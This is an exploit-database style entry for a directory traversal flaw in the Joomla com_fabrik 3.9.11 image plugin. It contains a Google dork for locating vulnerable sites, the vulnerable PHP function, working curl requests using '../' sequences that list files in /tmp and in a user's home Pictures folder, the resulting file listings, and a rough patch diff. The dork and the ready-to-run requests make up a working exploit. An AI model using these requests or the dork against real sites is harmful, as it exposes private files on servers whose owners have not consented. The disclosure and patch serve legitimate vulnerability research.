Joomla Fabrik 3.9.11 Directory Traversal

`# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal  
#Google Dork: inurl:"index.php?option=com_fabrik"  
#Date: 2020-03-30  
#Exploit Author: qw3rTyTy  
#Vendor Homepage: https://fabrikar.com/  
#Software Link: https://fabrikar.com/downloads  
#Version: 3.9  
#Tested on: Debian/Nginx/Joomla! 3.9.11  
##################################################################  
#Vulnerability details  
##################################################################  
File: fabrik_element/image/image.php  
Func: onAjax_files  
  
394 public function onAjax_files()  
395 {  
396 $this->loadMeForAjax();  
397 $folder = $this->app->input->get('folder', '', 'string'); //!!!Possible to directory-traversal.  
398  
399 if (!strstr($folder, JPATH_SITE))  
400 {  
401 $folder = JPATH_SITE . '/' . $folder;  
402 }  
403  
404 $pathA = JPath::clean($folder);  
405 $folder = array();  
406 $files = array();  
407 $images = array();  
408 FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders);  
409  
410 if (!array_key_exists('/', $images))  
411 {  
412 $images['/'] = array();  
413 }  
414  
415 echo json_encode($images['/']);  
416 }  
##################################################################  
#PoC  
##################################################################  
$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/"  
  
...snip...  
[{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}]  
...snip...  
  
$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/"  
  
...snip...  
[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}]  
...snip...  
##################################################################  
#Q&D Patch (DO NOT USE :3)  
##################################################################  
--- ./image.php ---  
+++ image_patched.php ---  
@@ -394,7 +394,7 @@  
public function onAjax_files()  
{  
$this->loadMeForAjax();  
- $folder = $this->app->input->get('folder', '', 'string');  
+ $folder = $this->app->input->get('folder', '', 'cmd');  
  
if (!strstr($folder, JPATH_SITE))  
{  
`